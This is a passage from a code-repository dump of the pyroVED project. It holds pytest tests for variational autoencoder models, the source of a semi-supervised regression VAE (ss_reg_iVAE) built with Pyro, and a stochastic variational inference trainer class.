test_basevae_encode_xy():\n data_dim = (2, 64)\n x = torch.randn(*data_dim)\n alpha = torch.ones(data_dim[0], 3) / 3\n y = dist.OneHotCategorical(alpha).sample()\n vae = models.base.baseVAE(data_dim[1:], None)\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2, 3)\n vae.set_encoder(encoder_net)\n encoded = vae._encode(x, y)\n assert_equal(encoded[:, :2].shape, (data_dim[0], 2))\n assert_equal(encoded[:, 2:].shape, (data_dim[0], 2))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_basevae_decode_x(invariances):\n data_dim = (3, 8, 8)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n z = torch.randn(data_dim[0], 2)\n vae = models.base.baseVAE(data_dim[1:], invariances)\n vae.coord = coord\n vae.grid = utils.generate_grid(data_dim[1:]).to(vae.device)\n dnet = nets.sDecoderNet if 0 < coord < 5 else nets.fcDecoderNet\n decoder_net = dnet(data_dim[1:], 2)\n vae.set_decoder(decoder_net)\n decoded = vae._decode(z)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"vae_model\", [models.jiVAE, models.ssiVAE])\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_jsstrvae_decode(vae_model, invariances):\n data_dim = (38, 8)\n model = vae_model(data_dim, 2, 3, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), 3)\n decoded = model.decode(z_coord, y)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_trvae_decode_2d(invariances):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_decode_1d(invariances):\n 
data_dim = (8,)\n model = models.iVAE(data_dim, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_decode(input_dim, output_dim):\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n model = models.VED(input_dim, output_dim)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, output_dim)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_predict(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n model = models.VED(input_dim, output_dim)\n prediction, _ = model.predict(x)\n assert_equal(prediction.squeeze().shape, (2, *output_dim))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_ctrvae_decode(invariances):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, c_dim=3, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), 3)\n decoded = model.decode(z_coord, y)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_trvae_encode_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.iVAE(data_dim[1:], 2, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_encode_1d(invariances):\n data_dim = (3, 8)\n x = torch.randn(*data_dim)\n coord = 0 if invariances is None else 
len(invariances)\n model = models.iVAE(data_dim[1:], 2, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_encode(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n model = models.VED(input_dim, output_dim)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (x.shape[0], 2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_jtrvae_encode(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, encoded[1].shape)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[2].shape, (data_dim[0],))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_sstrvae_encode(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 5, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, encoded[1].shape)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[2].shape, (data_dim[0],))\n\n\[email protected](\"num_classes\", [0, 2, 3])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_trvae_manifold2d(invariances, num_classes):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, c_dim=num_classes, invariances=invariances)\n y 
= None\n if num_classes > 0:\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), num_classes)\n decoded_grid = model.manifold2d(4, y, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *data_dim))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_manifold2d(input_dim, output_dim):\n model = models.VED(input_dim, output_dim)\n decoded_grid = model.manifold2d(4, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *output_dim))\n\n\[email protected](\"vae_model\", [models.jiVAE, models.ssiVAE])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_jsstrvae_manifold2d(vae_model, invariances):\n data_dim = (8, 8)\n model = vae_model(data_dim, 2, 3, invariances=invariances)\n decoded_grid = model.manifold2d(4, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *data_dim))\n\n\[email protected](scope='session')\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_save_load_basevae(invariances):\n data_dim = (5, 8, 8)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n vae = models.base.baseVAE()\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2+coord, 0)\n dnet = nets.sDecoderNet if 0 < coord < 5 else nets.fcDecoderNet\n decoder_net = dnet(data_dim, 2, 0)\n vae.set_encoder(encoder_net)\n vae.set_decoder(decoder_net)\n weights_init = dc(vae.state_dict())\n vae.save_weights(\"my_weights\")\n vae.load_weights(\"my_weights.pt\")\n weights_loaded = vae.state_dict()\n assert_(assert_weights_equal(weights_loaded, weights_init))" }, { "alpha_fraction": 0.5469996333122253, "alphanum_fraction": 0.5520685911178589, "avg_line_length": 38.68935012817383, "blob_id": "afb5bed9be912ede9073b0b474ec0717e75441b0", "content_id": "5d1cac410d1e1ec2303007fe4b53fae014226598", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 13415, "license_type": "permissive", "max_line_length": 87, "num_lines": 338, "path": "/pyroved/models/ss_reg_ivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nss_reg_ivae.py\n==============\n\nVariational autoencoder for semi-supervised regression\nwith an option to enforce orientational, positional and scale\ninvariances\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import List, Optional, Tuple, Type, Union\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom ..nets import fcDecoderNet, fcEncoderNet, fcRegressorNet, sDecoderNet\nfrom ..utils import (generate_latent_grid, get_sampler, init_dataloader,\n plot_img_grid, plot_spect_grid, set_deterministic_mode,\n transform_coordinates)\nfrom .base import baseVAE\n\n\nclass ss_reg_iVAE(baseVAE):\n \"\"\"\n Semi-supervised variational autoencoder for regression tasks\n with the enforcement of rotational, translational, and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n reg_dim:\n Number of output dimensions in regression. For example,\n for a single output regressor, specify reg_dim=1.\n invariances:\n List with invariances to enforce. 
For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n hidden_dim_cls:\n Number of hidden units (\"neurons\") in each layer of classifier\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n num_layers_cls:\n Number of layers in classifier\n activation:\n Non-linear activation for inner layers of both encoder and the decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is \"tanh\").\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n regressor_sig:\n Sets sigma for a regression sampler\n\n Examples:\n\n Initialize a VAE model with rotational invariance for\n a semi-supervised single-output regression.\n\n >>> data_dim = (28, 28)\n >>> ssvae = ss_reg_iVAE(data_dim, latent_dim=2, reg_dim=1, 
invariances=['r'])\n \"\"\"\n def __init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n reg_dim: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n hidden_dim_cls: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n num_layers_cls: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes ss_reg_iVAE parameters\n \"\"\"\n args = (data_dim, invariances)\n super(ss_reg_iVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n\n self.data_dim = data_dim\n\n # Initialize z-Encoder neural network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim+self.coord, reg_dim,\n hidden_dim_e, num_layers_e, activation, flat=False)\n\n # Initialize y-Encoder neural network\n self.encoder_y = fcRegressorNet(\n data_dim, reg_dim, hidden_dim_cls, num_layers_cls,\n activation)\n\n # Initializes Decoder neural network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, reg_dim, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d,\n unflat=False)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Set sigma for regression sampler\n self.reg_sig = kwargs.get(\"regressor_sig\", 0.5)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.reg_dim = reg_dim\n\n # Send model parameters to their appropriate devices.\n self.to(self.device)\n\n def model(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Model of the generative process p(x|z,y)p(y)p(z)\n \"\"\"\n pyro.module(\"ss_vae\", self)\n batch_dim = xs.size(0)\n specs = dict(dtype=xs.dtype, device=xs.device)\n beta = kwargs.get(\"scale_factor\", 1.)\n # pyro.plate enforces independence between variables in batches xs, ys\n with pyro.plate(\"data\"):\n # 
sample the latent vector from the constant prior distribution\n prior_loc = torch.zeros(batch_dim, self.z_dim, **specs)\n prior_scale = torch.ones(batch_dim, self.z_dim, **specs)\n with pyro.poutine.scale(scale=beta):\n zs = pyro.sample(\n \"z\", dist.Normal(prior_loc, prior_scale).to_event(1))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, zs = self.split_latent(zs)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(zs.shape[0], *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # sample label from the constant prior or observe the value\n c_prior = (torch.zeros(batch_dim, self.reg_dim, **specs))\n ys = pyro.sample(\n \"y\", dist.Normal(c_prior, self.reg_sig).to_event(1), obs=ys)\n # Score against the parametrized distribution\n # p(x|y,z) = bernoulli(decoder(y,z))\n d_args = (x_coord_prime, [zs, ys]) if self.coord else ([zs, ys],)\n loc = self.decoder(*d_args)\n loc = loc.view(*ys.shape[:-1], -1)\n pyro.sample(\"x\", self.sampler_d(loc).to_event(1), obs=xs)\n\n def guide(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Guide q(z|y,x)q(y|x)\n \"\"\"\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\"):\n # sample and score the digit with the variational distribution\n # q(y|x) = categorical(alpha(x))\n if ys is None:\n c = self.encoder_y(xs)\n ys = pyro.sample(\"y\", dist.Normal(c, self.reg_sig).to_event(1))\n # sample (and score) the latent vector with the variational\n # distribution q(z|x,y) = normal(loc(x,y),scale(x,y))\n loc, scale = self.encoder_z([xs, ys])\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(loc, scale).to_event(1))\n\n def split_latent(self, zs: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts with rotation and/or translation\n and image 
content\n \"\"\"\n zdims = list(zs.shape)\n zdims[-1] = zdims[-1] - self.coord\n zs = zs.view(-1, zs.size(-1))\n # For 1D, there is only translation\n phi, dx, sc, zs = self._split_latent(zs)\n return phi, dx, sc, zs.view(*zdims)\n\n def model_aux(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Models an auxiliary (supervised) loss\n \"\"\"\n pyro.module(\"ss_vae\", self)\n with pyro.plate(\"data\"):\n # the extra term to yield an auxiliary loss\n aux_loss_multiplier = kwargs.get(\"aux_loss_multiplier\", 20)\n if ys is not None:\n c = self.encoder_y.forward(xs)\n with pyro.poutine.scale(scale=aux_loss_multiplier):\n pyro.sample(\n \"y_aux\", dist.Normal(c, self.reg_sig).to_event(1), obs=ys)\n\n def guide_aux(self, xs, ys=None, **kwargs):\n \"\"\"\n Dummy guide function to accompany model_aux\n \"\"\"\n pass\n\n def set_regressor(self, reg_net: Type[torch.nn.Module]) -> None:\n \"\"\"\n Sets a user-defined regression network\n \"\"\"\n self.encoder_y = reg_net\n\n def regressor(self,\n x_new: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Applies trained regressor to new data\n\n Args:\n x_new:\n Input data for the regressor part of trained ss-reg-VAE.\n The new data must have the same dimensions\n (images height x width or spectra length) as the one used\n for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n def regress(x_i) -> torch.Tensor:\n with torch.no_grad():\n predicted = self.encoder_y(x_i)\n return predicted.cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n y_predicted = []\n for (x_i,) in x_new:\n y_predicted.append(regress(x_i.to(self.device)))\n return torch.cat(y_predicted)\n\n def encode(self,\n x_new: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode. 
The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n y:\n Vector with a continuous variable(s) for each sample in x_new.\n If not provided, the ss-reg-iVAE's regressor will be used to obtain it.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n if y is None:\n y = self.regressor(x_new, **kwargs)\n z = self._encode(x_new, y, **kwargs)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale, y\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Vector with continuous variable(s) for each sample in z\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, y: torch.Tensor, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Returns a learned latent manifold in the image space\n\n Args:\n d: Grid size\n y: Conditional vector\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values\n for grid boundaries passed as 'z_coord'\n (e.g. 
z_coord = [-3, 3, -3, 3]), 'angle' and\n 'shift' to condition a generative model on, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n y = y.unsqueeze(1) if 0 < y.ndim < 2 else y\n y = y.expand(z.shape[0], *y.shape[1:])\n loc = self.decode(z, y, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.5404071807861328, "alphanum_fraction": 0.5499691367149353, "avg_line_length": 36.051429748535156, "blob_id": "f2a7812d420db5927e900670731b6f523c17fe6e", "content_id": "e4cf12c0ed58ff8a8c2f552c5c0a3ef6151b269a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6488, "license_type": "permissive", "max_line_length": 104, "num_lines": 175, "path": "/pyroved/trainers/svi.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Type, Optional, Union\n\nimport torch\nimport pyro\nimport pyro.infer as infer\nimport pyro.optim as optim\n\nfrom ..utils import set_deterministic_mode\n\n\nclass SVItrainer:\n \"\"\"\n Stochastic variational inference (SVI) trainer for\n unsupervised and class-conditioned VED models consisting\n of one encoder and one decoder.\n\n Args:\n model:\n Initialized model. 
Must be a subclass of torch.nn.Module\n and have self.model and self.guide methods\n optimizer:\n Pyro optimizer (Defaults to Adam with learning rate 1e-3)\n loss:\n ELBO objective (Defaults to pyro.infer.Trace_ELBO)\n enumerate_parallel:\n Exact discrete enumeration for discrete latent variables\n seed:\n Enforces reproducibility\n \n Keyword Args:\n lr: learning rate (Default: 1e-3)\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n\n Examples:\n\n Train a model with SVI trainer using default settings\n\n >>> # Initialize model\n >>> data_dim = (28, 28)\n >>> trvae = pyroved.models.iVAE(data_dim, latent_dim=2, invariances=['r', 't'])\n >>> # Initialize SVI trainer\n >>> trainer = SVItrainer(trvae)\n >>> # Train for 200 epochs:\n >>> for _ in range(200):\n >>> trainer.step(train_loader)\n >>> trainer.print_statistics()\n\n Train a model with SVI trainer with a \"time\"-dependent KL scaling factor\n\n >>> # Initialize model\n >>> data_dim = (28, 28)\n >>> rvae = pyroved.models.iVAE(data_dim, latent_dim=2, invariances=['r'])\n >>> # Initialize SVI trainer\n >>> trainer = SVItrainer(rvae)\n >>> kl_scale = torch.linspace(1, 4, 50) # ramp-up KL scale factor from 1 to 4 during first 50 epochs\n >>> # Train\n >>> for e in range(100):\n >>> sc = kl_scale[e] if e < len(kl_scale) else kl_scale[-1]\n >>> trainer.step(train_loader, scale_factor=sc)\n >>> trainer.print_statistics()\n \"\"\"\n def __init__(self,\n model: Type[torch.nn.Module],\n optimizer: Type[optim.PyroOptim] = None,\n loss: Type[infer.ELBO] = None,\n enumerate_parallel: bool = False,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes the trainer's parameters\n \"\"\"\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n if optimizer is None:\n lr = kwargs.get(\"lr\", 1e-3)\n optimizer = 
optim.Adam({\"lr\": lr})\n if loss is None:\n if enumerate_parallel:\n loss = infer.TraceEnum_ELBO(\n max_plate_nesting=1, strict_enumeration_warning=False)\n else:\n loss = infer.Trace_ELBO()\n guide = model.guide\n if enumerate_parallel:\n guide = infer.config_enumerate(guide, \"parallel\", expand=True) \n self.svi = infer.SVI(model.model, guide, optimizer, loss=loss)\n self.loss_history = {\"training_loss\": [], \"test_loss\": []}\n self.current_epoch = 0\n\n def train(self,\n train_loader: Type[torch.utils.data.DataLoader],\n **kwargs: float) -> float:\n \"\"\"\n Trains a single epoch\n \"\"\"\n # initialize loss accumulator\n epoch_loss = 0.\n # do a training epoch over each mini-batch returned by the data loader\n for data in train_loader:\n if len(data) == 1: # VAE mode\n x = data[0]\n loss = self.svi.step(x.to(self.device), **kwargs)\n else: # VED or cVAE mode\n x, y = data\n loss = self.svi.step(\n x.to(self.device), y.to(self.device), **kwargs)\n # do ELBO gradient and accumulate loss\n epoch_loss += loss\n\n return epoch_loss / len(train_loader.dataset)\n\n def evaluate(self,\n test_loader: Type[torch.utils.data.DataLoader],\n **kwargs: float) -> float:\n \"\"\"\n Evaluates current models state on a single epoch\n \"\"\"\n # initialize loss accumulator\n test_loss = 0.\n # compute the loss over the entire test set\n with torch.no_grad():\n for data in test_loader:\n if len(data) == 1: # VAE mode\n x = data[0]\n loss = self.svi.step(x.to(self.device), **kwargs)\n else: # VED or cVAE mode\n x, y = data\n loss = self.svi.step(\n x.to(self.device), y.to(self.device), **kwargs)\n test_loss += loss\n\n return test_loss / len(test_loader.dataset)\n\n def step(self,\n train_loader: Type[torch.utils.data.DataLoader],\n test_loader: Optional[Type[torch.utils.data.DataLoader]] = None,\n **kwargs: float) -> None:\n \"\"\"\n Single training and (optionally) evaluation step\n\n Args:\n train_loader:\n Pytorch’s dataloader object with training data\n test_loader:\n 
(Optional) Pytorch’s dataloader object with test data\n \n Keyword Args:\n scale_factor:\n Scale factor for KL divergence. See e.g. https://arxiv.org/abs/1804.03599\n Default value is 1 (i.e. no scaling)\n \"\"\"\n train_loss = self.train(train_loader, **kwargs)\n self.loss_history[\"training_loss\"].append(train_loss)\n if test_loader is not None:\n test_loss = self.evaluate(test_loader, **kwargs)\n self.loss_history[\"test_loss\"].append(test_loss)\n self.current_epoch += 1\n\n def print_statistics(self) -> None:\n \"\"\"\n Prints training and test (if any) losses for current epoch\n \"\"\"\n e = self.current_epoch\n if len(self.loss_history[\"test_loss\"]) > 0:\n template = 'Epoch: {} Training loss: {:.4f}, Test loss: {:.4f}'\n print(template.format(e, self.loss_history[\"training_loss\"][-1],\n self.loss_history[\"test_loss\"][-1]))\n else:\n template = 'Epoch: {} Training loss: {:.4f}'\n print(template.format(e, self.loss_history[\"training_loss\"][-1]))\n" } ]
19
qkrckdgus1015/first_project
https://github.com/qkrckdgus1015/first_project
c9dfb08d6cda90eb2a5dac67661af54886881626
97f40262443a88d32401fe85c06a839984804d50
aa28346b6a666a2de26737c580705c51746061d5
refs/heads/main
2023-03-24T07:40:34.417594
2021-03-26T06:44:19
2021-03-26T06:44:19
351,663,260
0
0
MIT
2021-03-26T04:38:04
2021-03-26T04:38:06
2021-03-26T06:44:19
null
[ { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20, "blob_id": "acce43d6989d3bf2cabb25cc38ef4abd8cdee1ba", "content_id": "684d09ac4b21ccfe37a4329f895f16c9ae287835", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "permissive", "max_line_length": 20, "num_lines": 1, "path": "/main.py", "repo_name": "qkrckdgus1015/first_project", "src_encoding": "UTF-8", "text": "print('hello git 3')\n" } ]
1
LoggerWang/python_study
https://github.com/LoggerWang/python_study
3e17ea81414810ed4f9a7aa1c8a87e686eb5a346
11da30c79298ddefea234489f899c05df1b2cd41
16fda2495983775131a9655abca1ebede28a9cac
refs/heads/master
2021-05-05T05:39:45.777387
2018-01-24T01:54:45
2018-01-24T01:54:45
118,694,825
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6581818461418152, "alphanum_fraction": 0.7018181681632996, "avg_line_length": 16.25, "blob_id": "95d3914f40b6a99d652f1e1df906efe030a19514", "content_id": "e050c4de146b89289752f45ba8d606995b553e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 59, "num_lines": 16, "path": "/python_legend/__init__.py", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\n\n\n\n\"\"\"\n@version: python3\n@author: ‘WangLezhi‘\n@license: Apache Licence \n@contact: [email protected]\n@site: http://blog.csdn.net/zhongguobaozi?viewmode=contents\n@software: PyCharm Community Edition\n@file: __init__.py.py\n@time: 2018/1/24 9:31\n\"\"\"" }, { "alpha_fraction": 0.7588744759559631, "alphanum_fraction": 0.7800865769386292, "avg_line_length": 23.827957153320312, "blob_id": "748bad3f4fe7a48323a6f1513a448713f930245b", "content_id": "aa6d2e183f4e17baf95258a0fa3291c914245d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4466, "license_type": "no_license", "max_line_length": 243, "num_lines": 93, "path": "/python_legend/doc/初识python.md", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "#初识Python\n- 3月都快结束了,又到了万物交配的季节!是时候执行今年的计划之一了,再学一门语言,那就python吧!好记性不如烂笔头,还是把学习的东西记录一下,以便加深印象和后面翻阅\n\n## 一、什么是Python[(官网)](https://www.python.org/)\n- Python是人称龟叔的Guido va Rossum在1989编写的一门高级编程语言。python有很完善的内置基础代码库,包括网络、文件GUI、数据库、文本等,所以在python开始有许多功能不必去重复造轮子。另外还有大量的第三方库可以拿来使用。\n- 据说现在很多网内外的主流网站都是用python开发的,具体哪些网站我也没法去验证,不过个人感觉python还是挺牛逼的。\n## 二、Python的优缺点\n- 优点:优雅、明确、简单、易读,对初学者入门门槛低,代码量少。\n- 缺点:python是解释型语言,代码在执行的时候需要逐行翻译成CPU需要的机器码,比较耗时,所以运行速度相对C比较慢。另外一个缺点就是解释型的语言都不能加密,发布出去的代码都是源代码,\n- python的应用场景:网站、后台、脚本等\n- 
环境搭建:下载[Windows64位Python3.5](https://www.python.org/ftp/python/3.5.2/python-3.5.2-amd64.exe)或[32位Python3.5](https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe)后添加到环境变量,环境配置好之后,运行cmd,输入python,如果显示有Pyhton 3.5.X就是配置成功,否则就是环境变量没有配好,需要重新配置。\n\n## 三、Python解释器\n- python写的代码是已.py结尾的文件,有多重python解释器。\n- CPython:应用最广泛,官网下载安装的python3.5就能获取到一个官方版本的python解释器,也就是CPython,顾名思义CPython就是用用C语言开发的python解释器,它以>>>作为提示符\n- 当然还有其他解释器,如IPython是在CPython之上的一个交互式解释器,相比增强了交互方式,但是执行代码的功能和CPython是一样的,还有Pypy、Jython、IronPython等解释器类型。如果要和Java或.Net平台交互,最好的办法不是用Jython或IronPython,而是通过网络调用来交互,确保各程序之间的独立性。\n-\n## 四、HelloWorld\n- 每学一门开发语言都是从HelloWorld入手的,Python的hellowrold是这样的:在dos窗口下的命令行输入python,进入到python交互式窗口,这时有>>>的提示符,输入:\n\n```\nprintf('hello,world')\n```\n然后就有hello,world输出了,就是这么简单。如果在>>>后面输入1+2,回车,会输出结果3\n\n- 除了直接在python交互环境下输入python代码之外,还可以运行一个.py的文件去执行文件里的python代码,比如,在命令行模式下执行:\n\n```\nC:\\work>python calc.py\n```\n解释器就会代码执行python calc.py里的代码\n- 退出python交互环境:exit()\n\n\n## 